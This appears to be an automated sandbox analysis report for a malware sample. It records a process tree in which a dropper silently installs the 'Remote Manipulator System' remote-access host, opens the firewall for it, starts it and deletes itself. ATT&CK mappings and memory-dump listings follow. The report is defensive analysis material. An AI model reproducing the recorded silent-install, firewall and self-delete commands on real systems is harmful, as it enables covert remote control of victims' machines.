- C:\Windows\system32\NETSTAT.EXE
  "C:\Windows\system32\NETSTAT.EXE" -na
  2⤵
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:1528
- C:\Windows\system32\NETSTAT.EXE
  "C:\Windows\system32\NETSTAT.EXE" -na
  2⤵
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:560
- C:\Users\Admin\AppData\Local\Temp\tmp\RMS.exe
  "C:\Users\Admin\AppData\Local\Temp\tmp\RMS.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1000
- - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe
    "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe" /rsetup
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1572
  - - C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3ru_mod.msi" /qn
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:544
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\Users\Admin\AppData\Local\Temp\killself.bat
      4⤵
      PID:1500

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1968

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1496
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding A73C8E42006320536EDD5E741232C0A3
  2⤵
  - Loads dropped DLL
  PID:788
- C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
  "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /silentinstall
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:2020
- C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
  "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /firewall
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:1820
- C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
  "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /start
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:1584

C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
"C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:868
- C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
  "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe"
  2⤵
  - Executes dropped EXE
  PID:1044
- C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
  "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" /tray
  2⤵
  - Executes dropped EXE
  PID:1852

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Registry Run Keys / Startup Folder

T1060

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/656-60-0x00000000022C0000-0x00000000022C2000-memory.dmp

Filesize
8KB

Download
memory/856-54-0x000007FEF2CE0000-0x000007FEF3D76000-memory.dmp

Filesize
16.6MB

Download
memory/856-56-0x000007FEF1FF0000-0x000007FEF2B4D000-memory.dmp

Filesize
11.4MB

Download
memory/856-86-0x00000000005ED000-0x00000000005EF000-memory.dmp

Filesize
8KB

Download
memory/856-87-0x000000001AD20000-0x000000001AD39000-memory.dmp

Filesize
100KB

Download
memory/856-55-0x00000000005C0000-0x00000000005C2000-memory.dmp

Filesize
8KB

Download
memory/868-134-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/1000-90-0x0000000075891000-0x0000000075893000-memory.dmp

Filesize
8KB

Download
memory/1572-100-0x00000000001D0000-0x00000000001D1000-memory.dmp

Filesize
4KB

Download
memory/1584-133-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/1820-115-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/1852-143-0x00000000001C0000-0x00000000001C1000-memory.dmp

Filesize
4KB

Download
memory/1968-67-0x000007FEFBE91000-0x000007FEFBE93000-memory.dmp

Filesize
8KB

Download
memory/2020-114-0x00000000001D0000-0x00000000001D1000-memory.dmp

Filesize
4KB

Download